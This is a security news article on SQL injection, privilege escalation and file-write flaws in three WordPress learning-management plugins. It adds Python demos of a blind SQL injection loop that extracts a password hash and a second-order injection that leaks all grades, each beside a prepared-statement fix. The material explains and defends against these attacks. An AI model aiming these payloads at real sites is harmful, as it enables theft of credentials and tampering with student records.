The popular WordPress plugins for building Learning Management Systems (LMS) contain vulnerabilities that can be used to spy on the platform, retrieve test answers and modify assessments.
Nowadays, these platforms have become the main instrument for running courses. Teachers, professors and hundreds of thousands of students rely on them to keep education as close to normal as possible.
LearnPress, LearnDash and LifterLMS are installed on at least 100,000 websites. Some are run by accredited institutions such as schools, academies and universities (Florida, Washington, Michigan); others are used by companies for training (paid or free of charge).
Check Point's security researchers found the flaws while analyzing the three WordPress plugins; some of them are more or less trivial to exploit. The technical details are in a report released today.
In total, they identified four vulnerabilities that could have been used to steal personal data (names, e-mail addresses, usernames, passwords), change payment methods, alter grades, forge certificates, obtain tests in advance or gain teacher privileges.
Some of the vulnerabilities can be exploited remotely without authentication, meaning a remote attacker could take over the LMS platform.
LearnPress versions 3.2.6.7 and earlier are vulnerable to a time-based blind SQL injection (CVE-2020-6010). It is trivial to exploit and could have been prevented by properly sanitizing user input and using prepared statements.
Through this flaw, an authenticated user can read usernames and hashed passwords out of the database. Whether the hashes can be cracked depends on how strong the passwords are.
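To make this class of bug concrete, here is an added example (not code from the Check Point report or from LearnPress) in Python, run against an in-memory SQLite table that stands in for wp_users. The sample users and the hash strings are constructed placeholders. It shows the injectable query pattern, the prepared-statement fix, and an extraction loop that recovers a password hash one character at a time from the single yes/no bit a blind injection leaks; a time-based variant would make the injected condition trigger a SLEEP() and measure response time instead, but the extraction loop is the same.

```python
import sqlite3
import string

# Constructed stand-in for the WordPress wp_users table. The hash strings are
# made-up placeholders in the phpass "$P$" style, not real credentials.
SAMPLE_USERS = [
    ("admin", "$P$BplaceholderHash0123456789abc"),
    ("student1", "$P$BanotherPlaceholderHashValue"),
]

# Characters a phpass hash can contain (the "$P$" prefix plus a base64-style body).
HASH_ALPHABET = string.ascii_letters + string.digits + "$./"


def make_db():
    """Builds the in-memory database the example runs against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_vulnerable(conn, user_login):
    """Injectable: the caller-supplied value is spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM wp_users WHERE user_login = '" + user_login + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_safe(conn, user_login):
    """Prepared statement: the value is bound as data and cannot alter the query."""
    sql = "SELECT COUNT(*) FROM wp_users WHERE user_login = ?"
    return conn.execute(sql, (user_login,)).fetchone()[0] > 0


def extract_hash(oracle, target_user, max_len=64):
    """Recovers target_user's password hash one character at a time.

    `oracle(value)` returns True when the application's query matched at least
    one row; that one bit is all a blind injection leaks. Each probe asks
    "is character `pos` of the hash equal to `ch`?".
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in HASH_ALPHABET:
            # Closes the original string literal, ORs in our condition, and
            # comments out the application's trailing quote.
            probe = (
                f"x' OR (SELECT substr(user_pass, {pos}, 1) FROM wp_users "
                f"WHERE user_login = '{target_user}') = '{ch}' -- "
            )
            if oracle(probe):
                matched = ch
                break
        if matched is None:
            # No candidate matched: we have run past the end of the hash.
            break
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    leaked = extract_hash(lambda v: user_exists_vulnerable(db, v), "admin")
    print("vulnerable endpoint leaked:", leaked)
    blocked = extract_hash(lambda v: user_exists_safe(db, v), "admin")
    print("prepared statement leaked:", repr(blocked))
```

Against the prepared-statement version the same probes are treated as a literal, nonexistent username, so the oracle never answers yes and nothing is recovered. Escaping alone is a weaker fix than binding: the bound parameter can never change the query structure, whatever characters it contains.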
Another flaw in the same plugin, tracked as CVE-2020-6011, lets an attacker escalate privileges and take on the teacher role. It exists because of legacy code that is still present in the product.
In LearnDash versions below 3.1.6, the researchers found an unauthenticated second-order SQL injection (CVE-2020-6009) that is harder to exploit but, again, preventable with prepared statements.
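What makes an injection "second-order" is that the malicious value is stored safely and only becomes dangerous when a later query reads it back and concatenates it. The following is an added example (not LearnDash's code; the tables, users and grade rows are constructed for illustration) in Python with SQLite: registration binds its parameter and is not injectable on its own, but a later grades report splices the stored login into a new query.

```python
import sqlite3

# Constructed stand-in for an LMS: a users table and a grades table.
SAMPLE_GRADES = [
    ("alice", "math-101", 71),
    ("bob", "math-101", 64),
]


def make_db():
    """Builds the in-memory database the example runs against."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, role TEXT)"
    )
    conn.execute("CREATE TABLE grades (user_login TEXT, course TEXT, score INTEGER)")
    conn.executemany(
        "INSERT INTO wp_users (user_login, role) VALUES (?, 'student')",
        [("alice",), ("bob",)],
    )
    conn.executemany("INSERT INTO grades VALUES (?, ?, ?)", SAMPLE_GRADES)
    return conn


def register(conn, user_login):
    """First order: a prepared statement stores the name verbatim. Nothing is
    injected here, and input filtering on this path alone would not be a reliable
    fix either, because the value is legitimate data until it is re-used unsafely."""
    cur = conn.execute(
        "INSERT INTO wp_users (user_login, role) VALUES (?, 'student')",
        (user_login,),
    )
    return cur.lastrowid


def my_grades_vulnerable(conn, user_id):
    """Second order: the login is read back from the database, trusted as
    "our own data", and spliced into a new query."""
    login = conn.execute(
        "SELECT user_login FROM wp_users WHERE id = ?", (user_id,)
    ).fetchone()[0]
    sql = f"SELECT user_login, course, score FROM grades WHERE user_login = '{login}'"
    return conn.execute(sql).fetchall()


def my_grades_safe(conn, user_id):
    """Fix: bind the value on every query, regardless of where it came from."""
    login = conn.execute(
        "SELECT user_login FROM wp_users WHERE id = ?", (user_id,)
    ).fetchone()[0]
    return conn.execute(
        "SELECT user_login, course, score FROM grades WHERE user_login = ?",
        (login,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The attacker registers with a name that closes the quote and ORs in a tautology.
    uid = register(db, "nobody' OR '1'='1")
    print("vulnerable report shows:", my_grades_vulnerable(db, uid))
    print("safe report shows:", my_grades_safe(db, uid))
```

The vulnerable report returns every student's grades to the attacker, while the bound version returns nothing because no grade row belongs to the literal login string. The practical lesson is that "comes from our database" is not a trust boundary: a value must be bound as a parameter at every query that uses it.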
While investigating LifterLMS, Check Point researchers Omri Herscovici and Sagi Tzadik found that versions below 3.37.15 suffer from an arbitrary file write (CVE-2020-6008).
An attacker could exploit this simply by putting malicious PHP code in their name. This can allow them to run code on the server through a web shell planted that way.
In the video below, the researchers demonstrate how they exploited the vulnerabilities they found in the three LMS plugins for WordPress:
Check Point informed the developers of the three plugins about the vulnerabilities, and the developers have released new versions that fix them. Administrators of sites running these plugins are strongly advised to install the updates.